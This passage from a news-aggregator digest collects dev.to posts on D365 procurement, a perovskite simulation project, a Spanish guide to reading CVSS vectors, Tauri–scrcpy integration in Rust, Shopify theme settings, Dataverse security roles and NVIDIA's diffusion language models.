If you are building AI applications today, stop trying to make your single agent a know-it-all. Focus on making it an A2A Server. The devs who learn how to wire these autonomous systems together are the ones who are going to architect the next decade of the web.

---
## Centralized procurement D365: global address book + vendors

> Published: 2026-05-24 05:37:06+00:00
> Source: https://dev.to/sapotacorp/centralized-procurement-d365-global-address-book-vendors-27mj
> wpnews: https://wpnews.pro/news/centralized-procurement-d365-global-address-book-vendors

The article explains how multi-legal-entity enterprises using D365 Finance can avoid vendor data duplication by leveraging the Global Address Book and centralized procurement features. The Global Address Book creates a single canonical vendor record (party) that is released to each legal entity with per-LE metadata, while centralized procurement allows one legal entity to purchase on behalf of another. This architecture ensures consistent vendor data, enables cross-LE spend reporting via a simple query, and eliminates the need for custom sync services or manual intercompany transactions.

Multi-legal-entity enterprises standing up centralized procurement on D365 Finance face a recurring master data problem. The same vendor gets purchases from multiple LEs, each with its own currency, tax rules, and approval hierarchy. Without discipline, the same vendor ends up configured three or four times - different addresses in each LE, different contact emails, different payment terms that don't actually reflect the contract.
Teams reach for custom sync services or per-LE vendor duplicates. Neither is necessary.
Configure separate vendor records per LE with custom sync. Adds a custom integration service between LEs to keep vendor data aligned. The service becomes a dependency that has to be maintained, monitored, and upgraded indefinitely. Every field addition requires integration changes.
Route all requisitions through manual intercompany transactions. Avoids duplicating vendors but shifts the pain to operations. Every cross-LE purchase becomes a multi-step manual process. Procurement teams resist; shadow-procurement workarounds appear within a month.
Enable procurement categories per LE and consolidate via Excel Power Query. Looks simple in design but means spend visibility lags behind transactions by whatever the reporting cycle is. CFO asks for "current total spend with Vendor X" and waits for a manual refresh.
The global address book plus centralized procurement features in D365 F&O.
What each piece does:
Global address book is the party-based master data layer that sits above legal entities. Each vendor is a party in the global address book with one canonical record. The party is released to each LE that transacts with it, with per-LE vendor metadata layered on top (payment terms, posting profile, default financial dimensions).
Centralized procurement allows one LE to purchase on behalf of another. The purchasing LE issues the PO, receives from the vendor, and then inter-companies the goods or services to the requesting LE. Standard feature, configured at the purchasing-LE level.
Shared vendor governance - new vendor requests route through a central procurement workflow. The vendor is created at the party level, then released to LEs with approval. No vendor exists in any LE without central approval.
The rules that keep global address book clean:
Without discipline, the global address book becomes the same mess as per-LE records with extra steps.
What stays LE-specific:
The party data (name, address, tax registration) stays at the global level. The operational behavior stays per-LE. Both are automatically consistent because they're one object with layered attributes.
Centralized procurement doesn't mean centralized approval. Each LE configures its own approval workflow based on:
The workflow is LE-local. The vendor record is global. The PO knows which LE it's from and applies the right workflow.
When LE A buys on behalf of LE B:
Standard functionality. Configured once per LE pair at setup.
With shared vendor master, cross-LE spend reporting is a query, not a consolidation project. Power BI over the shared vendor tables, financial dimensions cutting across LEs, and Procurement analytics workspaces surface:
All of this works because the vendor is one record.
A working centralized procurement architecture has:
The feature existed before the requirement. Getting the architecture right is about using it correctly, not extending it.

---
## Perovskite cell scaps simulation analysis

> Published: 2026-05-24 05:35:41+00:00
> Source: https://dev.to/asphane/perovskite-cell-scaps-simulation-analysis-544n
> wpnews: https://wpnews.pro/news/perovskite-cell-scaps-simulation-analysis

This article describes a final-year project that uses SCAPS-1D simulation data to create a structured analysis pipeline for Perovskite Solar Cells (PSCs). The project includes modules for studying dark I-V and illuminated J-V curves, layer thickness effects, temperature variation, and quantum efficiency, along with automated report generation and a machine-learning dashboard. The author credits GitHub Copilot for accelerating repetitive coding tasks, allowing more focus on the physics and analysis logic.

This is a submission for the GitHub Finish-Up-A-Thon Challenge
I built a final-year project around Perovskite Solar Cell (PSC) simulation and analysis using SCAPS-1D data. The repository is not just a set of plots; it is a structured analysis pipeline that studies dark I-V behavior, illuminated J-V curves, layer thickness effects, temperature variation, quantum efficiency, and ETL/HTL sweeps. I also added an automated report-generation workflow and a machine-learning dashboard to make the simulation results easier to explore and interpret.
GitHub repository: https://github.com/Asphane/perovskite-cell-scaps-simulation-analysis
Demo video: https://drive.google.com/file/d/1zSmQiwvoN42cu0jrwqucPoSIW9Lh2u1g/view?usp=sharing
This project started as raw simulation output and scattered analysis notebooks. I turned it into a cleaner, more complete project by organizing the work into separate modules for J-V analysis, dark I-V analysis, thickness optimization, QE, temperature sweep, and ETL/HTL sweep studies. I also added report generation so the findings could be documented more systematically instead of staying buried inside notebooks.
GitHub Copilot helped me move faster on repetitive work: notebook boilerplate, plotting code, data handling, and report-generation scripts. It reduced the amount of time I spent writing mechanical code and let me focus more on the physics, the analysis logic, and the structure of the final project.

---
## ¿Qué significan esas letras del CVSS? Guía para entenderlo de una vez

> Published: 2026-05-24 05:32:16+00:00
> Source: https://dev.to/byron_lainez/que-significan-esas-letras-del-cvss-guia-para-entenderlo-de-una-vez-gmh
> wpnews: https://wpnews.pro/news/que-significan-esas-letras-del-cvss-guia-para-entenderlo-de-una-vez

The article explains the Common Vulnerability Scoring System (CVSS), which uses a vector string to describe the severity and characteristics of a security vulnerability, not just a single numerical score. It breaks down the components of CVSS v3.1 and v4.0 vectors using a house burglary analogy, detailing how factors like Attack Vector, Complexity, and Impact determine the overall risk. The guide emphasizes that understanding the vector is crucial for an appropriate response, as the number alone does not explain the nature of the attack.

Cada vez que sale un CVE importante, alguien pega el vector CVSS en el chat del equipo y todos hacen como que lo entienden. Spoiler: la mayoría solo mira el número (9.1 CRITICAL) e ignora el resto.
El problema es que el número solo te dice qué tan grave es. El vector te dice por qué — y eso cambia completamente cómo respondes.
CVSS (Common Vulnerability Scoring System) es un sistema de puntuación para describir vulnerabilidades de seguridad. No solo te da un número: te da un vector, que es básicamente una descripción comprimida de cómo funciona el ataque.
Existen dos versiones que vas a ver seguido: v3.1 (la más común hoy) y v4.0 (la más nueva, más detallada). Voy a explicar las dos.
💡
💡 La escala de puntuación
0.1–3.9 LOW
4.0–6.9 MEDIUM
7.0–8.9 HIGH
9.0–10.0 CRITICALLa analogía del ladrón
Para entender el vector CVSS, imagina que una vulnerabilidad es como una forma de entrar a robar a una casa. El vector CVSS responde estas preguntas sobre el "robo":
🏠 Analogía **¿Desde dónde puede atacar el ladrón?** ¿Desde la calle, o tiene que estar en el jardín? *(Attack Vector)* **¿Es difícil entrar?** ¿Puerta abierta o cerradura de alta seguridad? *(Attack Complexity)* **¿Necesita una llave?** ¿O entra sin nada? *(Privileges Required)* **¿Alguien tiene que abrir la puerta desde adentro?** *(User Interaction)* **¿Qué se puede robar?** Documentos, muebles, o puede romper cosas también. *(Impactos: C/I/A)*
CVSS v3.1 — letra por letra
Tomemos este vector real del CVE-2024-9465 (Palo Alto Expedition):
CVSS v3.1 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N Código Nombre Valor en este CVE Qué significa en palabras simples AV:N Attack Vector — Network 🔴 Peligroso El atacante no necesita estar cerca físicamente. Puede atacar desde cualquier lugar del mundo por internet. *(N=Network, A=Adjacent, L=Local, P=Physical)* AC:L Attack Complexity — Low 🔴 Peligroso El ataque es fácil de ejecutar. No requiere condiciones especiales, timing exacto ni conocimiento avanzado. Cualquiera con el exploit puede hacerlo. *(L=Low, H=High)* PR:N Privileges Required — None 🔴 Peligroso El atacante no necesita ninguna cuenta ni contraseña previa. Llega, ataca, listo. *(N=None, L=Low, H=High)* UI:N User Interaction — None 🔴 Peligroso Ningún usuario tiene que hacer clic en nada, abrir ningún archivo ni visitar ningún enlace. El ataque funciona solo. *(N=None, R=Required)* S:U Scope — Unchanged ⚪ Neutral El impacto se queda en el sistema atacado. No "salta" automáticamente a otros sistemas. *(U=Unchanged, C=Changed)* C:H Confidentiality — High 🔴 Crítico Toda la información confidencial queda expuesta: contraseñas, API keys, configuraciones. El atacante puede leer todo. *(N=None, L=Low, H=High)* I:H Integrity — High 🔴 Crítico El atacante puede modificar o crear datos. En este caso, puede escribir archivos arbitrarios en el sistema. *(N=None, L=Low, H=High)* A:N Availability — None 🟢 Sin impacto El atacante no puede tirar el sistema. El servicio sigue disponible mientras lo explotan en silencio. *(N=None, L=Low, H=High)*
⚠️
⚠️ Cómo leer el resultado
AV:N + AC:L + PR:N + UI:N en el mismo vector = "cualquier persona en internet, sin esfuerzo, sin cuenta, sin ayuda de nadie" puede ejecutar el ataque. Eso, combinado con C:H, es la peor combinación posible para datos confidenciales.CVSS v4.0 — ¿qué cambia?
La versión 4.0 es más nueva y más detallada. Divide el impacto en dos partes: el sistema directamente atacado (Vulnerable System) y otros sistemas que podrían verse afectados (Subsequent System).
CVSS v4.0 CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:H/SI:N/SA:N Código Nombre Valor Qué significa AV:N Attack Vector — Network 🔴 Igual que en v3.1: ataque desde internet, sin estar cerca. AC:L Attack Complexity — Low 🔴 Fácil de ejecutar, sin condiciones especiales. AT:N Attack Requirements — None 🔴 **Nuevo en v4.0.** El ataque no depende de ninguna condición externa que no controle el atacante (como que haya sesiones activas o configuraciones específicas). *(N=None, P=Present)* PR:N Privileges Required — None 🔴 Sin cuenta, sin autenticación. UI:N User Interaction — None 🔴 Nadie tiene que hacer nada para que el ataque funcione. VC:H Vulnerable System Confidentiality — High 🔴 **El sistema atacado (Expedition):** toda su información queda expuesta. Hashes, configs, API keys. VI:L Vulnerable System Integrity — Low 🟡 **El sistema atacado:** el atacante puede modificar algunos datos, pero no tiene control total de escritura. Impacto parcial en integridad. VA:N Vulnerable System Availability — None 🟢 **El sistema atacado:** sigue funcionando. No hay denegación de servicio. SC:H Subsequent System Confidentiality — High 🔴 **Otros sistemas (los firewalls PAN-OS):** como las API keys quedan expuestas, los firewalls también quedan comprometidos en confidencialidad. El daño se propaga. SI:N Subsequent System Integrity — None 🟢 **Otros sistemas:** el atacante no puede modificar datos en los firewalls directamente a través de este vector. SA:N Subsequent System Availability — None 🟢 **Otros sistemas:** no puede tumbar los firewalls con este ataque.
💡
💡 La gran mejora de v4.0
v4.0 separa el impacto en VC/VI/VA (sistema directamente atacado) y SC/SI/SA (sistemas que se ven afectados después). En este CVE, eso es clave: Expedition tiene SC:H porque las API keys expuestas comprometen los firewalls. v3.1 no capturaba bien ese efecto en cadena.Resumen visual: cómo leer un vector rápido
CVSS:3.1 / AV:? / AC:? / PR:? / UI:? / S:? / C:? / I:? / A:?
> │ │ │ │ │ │ │ └─ ¿Se cae el servicio?
> │ │ │ │ │ │ └──────── ¿Puede modificar datos?
> │ │ │ │ │ └─────────────── ¿Puede leer datos privados?
> │ │ │ │ └───────────────────── ¿El daño se propaga a otros sistemas?
> │ │ │ └───────────────────────────── ¿Alguien tiene que hacer clic?
> │ │ └───────────────────────────────────── ¿Necesita cuenta o contraseña?
> │ └───────────────────────────────────────────── ¿Es difícil ejecutarlo?
> └───────────────────────────────────────────────────── ¿Desde dónde puede atacar?
>
> Valores de riesgo (de mayor a menor):
> N (None) / H (High) = 🔴 → Peor escenario
> L (Low) = 🟡 → Impacto parcial
> N (None en impacto) = 🟢 → Sin efecto en esa categoría
La frase que resume todo
Cuando veas un vector como el de CVE-2024-9465, tradúcelo a una sola frase antes de enviarlo al equipo:
📝 Traducción al español **"Cualquier persona en internet puede atacar este sistema sin credenciales ni ayuda de nadie, y obtener acceso completo a todos los datos confidenciales, incluyendo las llaves de tus firewalls."**
Eso es lo que dice el vector. Ahora sí sabes por qué tiene un 9.2.
Conclusión
El número CVSS te dice si debes preocuparte. El vector te dice cómo preocuparte. AV:N/AC:L/PR:N/UI:N juntos es lo más peligroso que existe: fácil, remoto y sin depender de nadie. Cuando lo veas así, actúa primero y analiza después.
✅
✅ Regla práctica
Si los primeros 4 campos son AV:N / AC:L / PR:N / UI:N — el atacante puede ser cualquier persona en internet, atacando sin esfuerzo, sin cuenta y sin ayuda. Parchea hoy.Compartir 🐦 Twitter/X 💼 LinkedIn
¿Te fue útil?
Mando contenido así cuando tengo algo que vale la pena.
Suscribirse ← Anterior CVE-2024-9465: SQL Injection en Palo Alto Expedition — CVSS 9.2 Todos los posts → Ver el blog completo byron.lainez © 2026 · Guatemala 🇬🇹

---
## Limerick

> Published: 2026-05-24 05:29:01+00:00
> Source: https://www.worldwidewords.org/surprise.html
> wpnews: https://wpnews.pro/news/limerick

The article defines "cyberventing" as the practice of using electronic means, such as websites or mass emails, to express anger or complaints, particularly against employers, retailers, or former colleagues. It notes that some employers have created official internal complaint sites to address issues openly, while also acknowledging that conflict resolution is a more effective long-term strategy for maintaining strong work relationships. The term is illustrated by examples like the "My Boss Sucks" website in New Zealand and a mass emailing incident at Intel.

Cyberventing
What do you do when you’re unhappy with your boss? Traditionally, you grumble to co-workers in the hallway, round the water cooler or over a drink after work. When e-mail, bulletin boards and chat rooms came along, some wrote messages to each other. Now the idea has been taken a step further: disgruntled employees are setting up Web sites to provide a forum for complaints. The term invented for this is cyberventing: venting your anger by electronic means. Some employers have even set up official grousing sites on internal Web systems, reasoning that it’s better to get the complaints out in the open than have problems fester in the dark. The term has also been applied to Web sites set up by people who are angry at the treatment they’ve received from retailers or suppliers, and also to the mass e-mailing of staff by aggrieved ex-workers, such as in a recent case at Intel.
While cyberventing is a convenient way to blow off steam, conflict resolution is the best way in the long run to build and maintain strong work relationships, he contends.
HR Magazine, Nov. 1999
Bosses in New Zealand must be pretty good, because none of them get a mention in the My Boss Sucks website. This is part of a new trend on the Internet — cyberventing, where you can complain to your heart’s content.
The Press (Canterbury, New Zealand), Mar. 2000

---
## scrcpy Integration in a Tauri App — Android Screen Mirroring on Mac

> Published: 2026-05-24 05:25:01+00:00
> Source: https://dev.to/hiyoyok/scrcpy-integration-in-a-tauri-app-android-screen-mirroring-on-mac-27k3
> wpnews: https://wpnews.pro/news/scrcpy-integration-in-a-tauri-app-android-screen-mirroring-on-mac

The article describes how to integrate scrcpy, an open-source Android screen mirroring tool, into a Tauri app for Mac. It covers launching scrcpy from Rust code, bundling it as a universal binary within the app's resources, detecting when the mirror window closes, and supporting multiple Android devices via ADB serial selection. The author tested the implementation on an 8-year-old MacBook Air while shipping seven Mac apps as a solo developer.

All tests run on an 8-year-old MacBook Air.
All results from shipping 7 Mac apps as a solo developer. No sponsored opinion.
HiyokoKit includes Android remote control via scrcpy. Launching and managing scrcpy from a Tauri app has specific challenges.
Here's how I handle it.
What scrcpy is
scrcpy is an open-source tool that mirrors and controls an Android device screen over ADB. It's the best free option for Android screen mirroring on Mac — fast, low latency, no app required on the device.
Launching scrcpy from Rust
rustuse std::process::{Command, Child};
use std::sync::Mutex;
pub struct ScrcpyProcess {
child: Option,
}
impl ScrcpyProcess {
pub fn start(
&mut self,
device_serial: &str,
max_size: u32,
bit_rate: &str,
) -> Result<(), AppError> {
let child = Command::new("scrcpy")
.args([
"--serial", device_serial,
"--max-size", &max_size.to_string(),
"--video-bit-rate", bit_rate,
"--window-title", "Android Mirror",
"--no-audio",
])
.spawn()
.map_err(|e| AppError::Scrcpy(e.to_string()))?;
self.child = Some(child);
Ok(())
}
pub fn stop(&mut self) {
if let Some(mut child) = self.child.take() {
child.kill().ok();
}
}
pub fn is_running(&mut self) -> bool {
if let Some(child) = &mut self.child {
child.try_wait().map(|s| s.is_none()).unwrap_or(false)
} else {
false
}
}
}
Bundling scrcpy
scrcpy needs to be available on the user's machine or bundled with your app. I bundle it in app resources as a universal binary:
json{
"bundle": {
"resources": [
"bin/scrcpy",
"bin/adb"
]
}
}
At runtime, get the resource path:
rustlet scrcpy_path = app_handle
.path()
.resource_dir()
.unwrap()
.join("bin/scrcpy");
Detecting when scrcpy exits
scrcpy exits when the user closes the mirror window. Detect this to update your UI:
rust// Poll in background
tokio::spawn(async move {
loop {
tokio::time::sleep(Duration::from_secs(1)).await;
let running = {
let mut proc = scrcpy_state.lock().unwrap();
proc.is_running()
};
if !running {
app_handle.emit("scrcpy-stopped", ()).ok();
break;
}
}
});
Multiple device support
scrcpy's --serial flag selects a specific device when multiple are connected. Get the serial from adb devices and pass it explicitly:
rustasync fn get_device_serial() -> Result {
let output = Command::new("adb")
.args(["devices"])
.output()
.await?;
let stdout = String::from_utf8_lossy(&output.stdout);
stdout.lines()
.skip(1)
.find(|l| l.contains("device"))
.and_then(|l| l.split_whitespace().next())
.map(|s| s.to_string())
.ok_or(AppError::Device("No device found".into()))
}
If this was useful, a ❤️ helps more than you'd think — thanks!
Hiyoko PDF Vault → https://hiyokomtp.lemonsqueezy.com/checkout
X → @hiyoyok

---
## Shopify theme editor: design tokens merchants can edit

> Published: 2026-05-24 05:20:05+00:00
> Source: https://dev.to/sapotacorp/shopify-theme-editor-design-tokens-merchants-can-edit-377i
> wpnews: https://wpnews.pro/news/shopify-theme-editor-design-tokens-merchants-can-edit

The article explains that Shopify themes use a `config/settings_schema.json` file to control which design elements, such as button colors, fonts, and border thickness, merchants can edit in the theme editor without needing to code. These settings are accessed in Liquid templates via a global variable and are often compiled into CSS custom properties for consistent styling across the theme. The key is to expose meaningful, non-technical controls that allow merchants to experiment safely without breaking the theme.

A merchant wants to experiment with design elements in the theme editor - button colors, font choices, border thickness, opacity. They're not comfortable editing Liquid code; they want to click, preview, save. The question for the developer: how do you expose the right knobs to the theme editor without giving merchants a way to break the theme?
Shopify themes have a specific file that controls which settings merchants see in the theme editor: config/settings_schema.json.
This schema defines:
A well-designed settings schema gives merchants meaningful control without overwhelming them with technical knobs.
config/settings_schema.json defines what the merchant sees:
config/settings_data.json holds the merchant's saved values. This file isn't edited by developers directly - it's updated every time the merchant saves settings in the theme editor.
Liquid templates consume the settings via settings.color_button_primary, settings.font_heading, etc.
The file that controls merchant-editable design is config/settings_schema.json. Adding a new setting there makes it appear in the theme editor's global settings. Merchants click, preview, save; the change propagates across every section that references the setting.
This is distinct from:
Shopify's settings schema supports many types. For design tokens, the useful ones:
For the scenario at the top - button colors, fonts, border thickness, opacity - the right setting types are color, font_picker, and range respectively.
In Liquid, settings are accessed via the global settings variable:
For bulk CSS styling, many themes compile settings into CSS custom properties in the layout:
Then component CSS uses the custom properties:
This separation means design-system changes in the theme editor propagate everywhere in one place.
Modern Shopify themes support color schemes - named combinations of background, text, button, and accent colors that apply to sections. A merchant can define "Light scheme" and "Dark scheme" and apply either to any section.
Color schemes live in the schema too but have their own structure:
This is the pattern Dawn and modern OS 2.0 themes use. Merchants pick a scheme per section; the theme renders with the scheme's colors consistently.
For fonts, the font_picker setting type returns a font object with a family name and loading URL. Themes use the font_url filter to load the right stylesheet:
This emits the proper @font-face declaration for the chosen font. Merchants can pick any of Shopify's library fonts (Google Fonts + system) and the theme adapts automatically.
A well-organized settings schema:
A schema with 100 ungrouped settings is unusable even by technical merchants. A schema with 15 well-organized settings lets non-technical merchants confidently experiment.
Not every theme value belongs in the settings schema. Good candidates:
Bad candidates:
The boundary: if a wrong value breaks the theme meaningfully, it doesn't belong in merchant-editable settings.
A theme that supports non-technical merchant self-service has:
Merchants who can self-serve design tokens stay happier with their theme. The developer's work is making the right set of knobs available without offering footguns.

---
## Dataverse security restructure: lessons applied too late

> Published: 2026-05-24 05:19:44+00:00
> Source: https://dev.to/sapotacorp/dataverse-security-restructure-lessons-applied-too-late-12o2
> wpnews: https://wpnews.pro/news/dataverse-security-restructure-lessons-applied-too-late

The article describes a common failure pattern in Dataverse security models, where roles, business units (BUs), and teams proliferate without clear purpose, leading to a complex and unmanageable system. It recommends a restructuring process that involves inventorying existing roles, grouping them into a few canonical "capability roles," flattening the BU tree to the root unless compliance requires separation, and using teams only for record ownership. The author emphasizes that maintaining a clean model requires locking new role creation and conducting a quarterly 45-minute review to prevent drift.

Dataverse gives you three access-control primitives that combine into a permission model: business units (BUs), security roles, and teams. On paper they are simple. In practice, every project that runs for more than a year develops the same failure mode: the security model grows by accretion - a new role for every department, a new team for every project, a new business unit every time someone says "but we need regional data separation." By year three, the model has twenty roles nobody remembers the purpose of, and access audits take a week.
We have walked three projects through a security restructure. The first took five weeks because we waited too long. The last took a week because we caught it at month three. Here is the pattern.
Business unit: the hierarchical container for users and records. A row in Dataverse is owned by a user or team, which sits in a BU. BUs form a tree from the root down.
Security role: a set of privileges per table (Create / Read / Write / Delete / Append / Append To / Assign / Share) and per scope (User / Business Unit / Parent:Child / Organization). Users get one or more roles.
Team: a group of users that can own records collectively and can have roles assigned to the team (all members inherit).
The common misreading is thinking of roles as job titles ("Sales Rep") and BUs as departments ("Sales"). The native mapping is actually:
When you try to use roles for data isolation ("a Europe Sales Rep role vs a US Sales Rep role") instead of BUs, you end up with N copies of the same role for each N regions. When you try to use BUs for capability ("a Read-Only BU") you get nonsense trees.
A project's security model has drifted when we see:
We inherited all five symptoms at a client last year, and the fix below is what we ran.
Inventory what exists. Export the security role matrix to a spreadsheet. Every role, every table, every privilege. This single document is the starting point of every conversation.
Group roles by intent. Look at the column of privileges per role and find clusters. Most "custom roles" actually map to 3-5 intents: Read-Only, Standard User, Power User, Admin, System Admin. Anything more granular is almost always a slight variation.
Define capability roles. Replace the cluster from step 2 with 3-5 canonical roles:
Identify real data isolation requirements. Most projects need ZERO BUs beyond the root. Ask concretely: "If a user sees a record they should not, does the business have an audit or compliance problem?" For most internal CRMs, the answer is no. For multi-country businesses with data residency rules, the answer is yes and you need one BU per country.
Collapse the BU tree. If you have seven BUs and zero of them have a compliance rationale, move all users to the root BU and delete the others. This is the biggest unlock - most "BU-scoped access" issues disappear when the tree flattens.
Use teams for ownership, not assignment. A team should own records that multiple users share responsibility for (a deal desk queue, a support triage pool). Do not create teams to hold users who share a role - that is what the role is for.
Migrate users to the new role set. Assign the new canonical roles; remove the old custom roles one by one and verify nothing breaks. Do this in a UAT mirror first, not in Prod.
Lock further role creation. New security roles require an explicit ticket and justification. "We need a new role for X" usually maps to "we need to add a capability to an existing role." Making the default answer "no" keeps the model clean for the long run.
Even a clean model drifts. Every quarter:
45 minutes per quarter, one engineer. The output is either "no changes" or a ticket to consolidate a role. Either outcome is healthy.
Changing a security role that is actively assigned to users does not always propagate immediately. Role changes take effect on the next user action or after a cache refresh, which can be up to fifteen minutes.
If you remove a privilege from a role expecting the change to apply now, and a user who has that role does something in the window between your change and their cache refresh, the old privilege is still in effect.
For non-urgent changes: ignore it, the cache will clear. For security-critical revocations (compromised account, departing employee): disable the user account, not the role. Account disable is immediate; role changes are eventually consistent.
If your project is six months in and you already see four custom roles with overlapping purpose: stop adding, don't restructure yet. Let the scope settle for another month, note every "new role" ticket that comes in without approving it, then run the eight-step restructure at month three. One week of focused work saves four weeks later.
If your project is two years in and unmaintainable: block out a dedicated two-week window, do the full restructure, treat it as a one-time debt payment, and then install the quarterly review. The pain does not go away on its own.

---
## Floatkit is live now!!!

> Published: 2026-05-24 05:19:26+00:00
> Source: https://dev.to/fari_ji/floatkit-is-live-now-4283
> wpnews: https://wpnews.pro/news/floatkit-is-live-now

The article announces the launch of Floatkit, a floating productivity panel for Android developed by Fari Ji. Built with Kotlin, the tool is designed to enhance user productivity by providing quick access to features directly from an overlay on the screen.

A Floating Productivity Panel I Built for Android

              Fari Ji
            

              
                Fari Ji
                
              
              

Fari Ji

                    
                      Follow
                    
                  

May 23

          A Floating Productivity Panel I Built for Android
        

#
showdev

#
android

#
kotlin

#
productivity

1
 reaction

              Comments

              
Add Comment

            2 min read

---
## SimGemma: Democratizing STEM Education with Offline-First AI Simulations

> Published: 2026-05-24 05:18:38+00:00
> Source: https://dev.to/damodharanj/simgemma-democratizing-stem-education-with-offline-first-ai-simulations-4409
> wpnews: https://wpnews.pro/news/simgemma-democratizing-stem-education-with-offline-first-ai-simulations

SimGemma is an offline-first, AI-powered platform built by tech lead and volunteer teacher Damodharan to generate interactive 3D science simulations using natural language. Designed for the Google Gemma Challenge, it uses the Gemma 4 model to allow educators in resource-constrained or disconnected classrooms to create physics and chemistry visualizations on demand. The platform also leverages Gemma 4’s translation capabilities to make these simulations accessible in regional languages like Tamil, aiming to bridge equity gaps in STEM education.

Imagine a classroom in a remote village. There’s a blackboard, a few passionate teachers, and curious students. What’s missing? A high-end physics lab. Even more challenging? A stable internet connection.
Physics is a subject that demands exploration. It’s hard to grasp the beauty of gravity or the silence of a vacuum from a two-dimensional drawing. This is why I built SimGemma—an offline-first, AI-powered platform designed to bring high-fidelity 3D science simulations to every classroom, regardless of connectivity.
I'm Damodharan, a Tech Lead who spends my weekends teaching math and science to kids through an NGO. I've always felt that teaching topics like pendulum motion or trigonometry on a blackboard didn't do justice to the science. These concepts, along with things like molecular structures (methane, for instance), are simply better understood in 3D.
SimGemma was created for the Google Gemma Challenge to demonstrate how open-weights models like Gemma can solve real-world problems in resource-constrained environments.
Traditional STEM education often suffers from two major hurdles:
I used to hand-code these simulations in Three.js, but it was time-consuming and hard to scale. I needed a way to generate these artifacts on demand.
SimGemma is a "Lab in a Box." It allows educators to generate interactive 3D simulations using simple natural language.
The heart of SimGemma is the Gemma 4 model. We chose Gemma for its exceptional performance-to-size ratio, making it perfect for local deployment.
We implemented a two-tier offline approach:
One of the most exciting aspects of SimGemma is what we call "Vibecoding." In our NGO workshops, we’ve seen that the biggest barrier to using technology in the classroom isn't lack of interest—it's the complexity of the tools.
With Gemma 4, we’ve turned the creation process into a conversation. A teacher can say: "Show me a double pendulum where the second arm is twice as heavy, and let's see it in Mars' gravity."
Gemma understands the physics constraints, generates the necessary React/Three.js code, and renders it instantly. It turns educators into creators.
Living in India, where we have 22 official languages, I’ve seen how language can be a barrier to quality STEM content. Gemma 4’s translation capabilities are a game-changer. SimGemma can generate and translate these artifacts into regional languages like Tamil instantly. This means a teacher can create a simulation in English and have it ready for a Tamil-medium classroom in seconds, ensuring no student is left behind because of a language gap.
As a STEM volunteer, I’ve seen firsthand how an interactive simulation can light up a student's eyes. SimGemma isn't just about code; it's about equity. It ensures that a child in a rural NGO workshop has access to the same quality of scientific exploration as a student in a tech-hub city.
SimGemma proves that "Offline AI" isn't a compromise—it's a superpower. By leveraging the open-weights of Gemma 4, we’ve built a tool that is resilient, private, and accessible.
We are currently looking into:
#Gemma #AI #OpenSource #Education #STEM #Physics #Remotion #ThreeJS

---
## Diffusion Language Models Are Here: Deep Dive into NVIDIA's Nemotron-Labs DLM Architecture

> Published: 2026-05-24 05:13:07+00:00
> Source: https://dev.to/monuminu/diffusion-language-models-are-here-deep-dive-into-nvidias-nemotron-labs-dlm-architecture-2ke2
> wpnews: https://wpnews.pro/news/diffusion-language-models-are-here-deep-dive-into-nvidia-s-nemotron-labs-dlm

NVIDIA has open-sourced the Nemotron-Labs Diffusion family of language models (3B, 8B, and 14B parameters), which replace traditional left-to-right autoregressive generation with a parallel denoising diffusion process. This architectural shift allows the models to refine all tokens in a block simultaneously, achieving up to 6.4× faster inference by overcoming the memory-bandwidth bottleneck that limits standard LLMs. The models address previous accuracy gaps in diffusion language models, making them competitive with autoregressive counterparts on standard benchmarks.

Meta Description:NVIDIA just open-sourced Nemotron-Labs Diffusion — a family of 3B, 8B, and 14B diffusion language models that merge autoregressive and diffusion generation for up to 6.4× faster inference. Here's the complete technical deep dive into the architecture, training methodology, three generation modes, and how to run it today with SGLang.

## Table of Contents

[The Speed Wall Autoregressive LLMs Hit](#1-the-speed-wall-autoregressive-llms-hit)[What Are Diffusion Language Models?](#2-what-are-diffusion-language-models)[Why DLMs Struggled — Until Now](#3-why-dlms-struggled--until-now)[NVIDIA's AR-to-DLM Breakthrough: Efficient-DLM](#4-nvidias-ar-to-dlm-breakthrough-efficient-dlm)[Nemotron-Labs Diffusion: The Model Family](#5-nemotron-labs-diffusion-the-model-family)[Three Generation Modes: AR, Diffusion, Self-Speculation](#6-three-generation-modes-ar-diffusion-self-speculation)[Performance Deep Dive: The Numbers That Matter](#7-performance-deep-dive-the-numbers-that-matter)[Under the Hood: Block-Wise Attention & KV Caching](#8-under-the-hood-block-wise-attention--kv-caching)[Getting Started: Running with SGLang](#9-getting-started-running-with-sglang)[What This Means for Production LLM Infrastructure](#10-what-this-means-for-production-llm-infrastructure)[Conclusion & The Road Ahead](#11-conclusion--the-road-ahead)

## 1. The Speed Wall Autoregressive LLMs Hit

Every language model you've ever used — GPT-4, Claude, Llama, Qwen — generates text the same fundamental way: one token at a time, left to right, each new token conditioned on every previous one. It's called **autoregressive (AR) generation**, and it's been the undisputed king of language modeling since the original GPT paper in 2018.

But AR generation has a dirty secret. It's not a compute-bound problem. It's a **memory-bandwidth-bound** problem.

Here's why that matters: each new token requires a full model forward pass. That means loading all the model's weights — potentially tens of gigabytes for a 7B model — from HBM (High Bandwidth Memory) into the GPU's compute cores, every single decoding step. On modern GPUs, the arithmetic throughput is enormous, but the memory bandwidth is the bottleneck. This is why serving an LLM at batch size 1 — a single user chatting with your model — leaves your GPU vastly underutilized.

The math is brutal. An A100 80GB GPU has ~2TB/s of HBM bandwidth. A 7B-parameter model in FP16 takes ~14GB. Reading all weights takes ~7ms minimum per step. At 30 tokens/second, you're spending the vast majority of each step just *moving weights*, not computing. Scale this to a production API endpoint handling thousands of concurrent users, and the economics become painful.

The community has attacked this problem from many angles: **speculative decoding** (using a small draft model to propose tokens verified by the large model), **quantization** (FP8, INT4 to shrink weight footprint), and **FlashAttention** (optimizing the KV-cache access pattern). These are all incremental improvements on the same fundamental loop.

NVIDIA's Nemotron-Labs Diffusion — released on HuggingFace on May 23, 2026 — is taking a fundamentally different approach. Instead of optimizing the autoregressive loop, it **breaks the loop entirely**.

## 2. What Are Diffusion Language Models?

If you've worked with image generation models (Stable Diffusion, DALL·E, Flux), you already know the concept of denoising diffusion. The idea is to start with pure noise and iteratively denoise it, guided by a conditioning signal, until you arrive at a coherent output.

**Diffusion Language Models (DLMs)** apply this same paradigm to text. Instead of generating tokens left-to-right, a DLM:

- Starts with a sequence of
**masked or noisy tokens**(analogous to Gaussian noise in image diffusion) - Runs multiple
**denoising refinement steps**, predicting the clean token distribution at each step - After several iterations, the entire sequence — or a large block of it —
**converges to the final output**

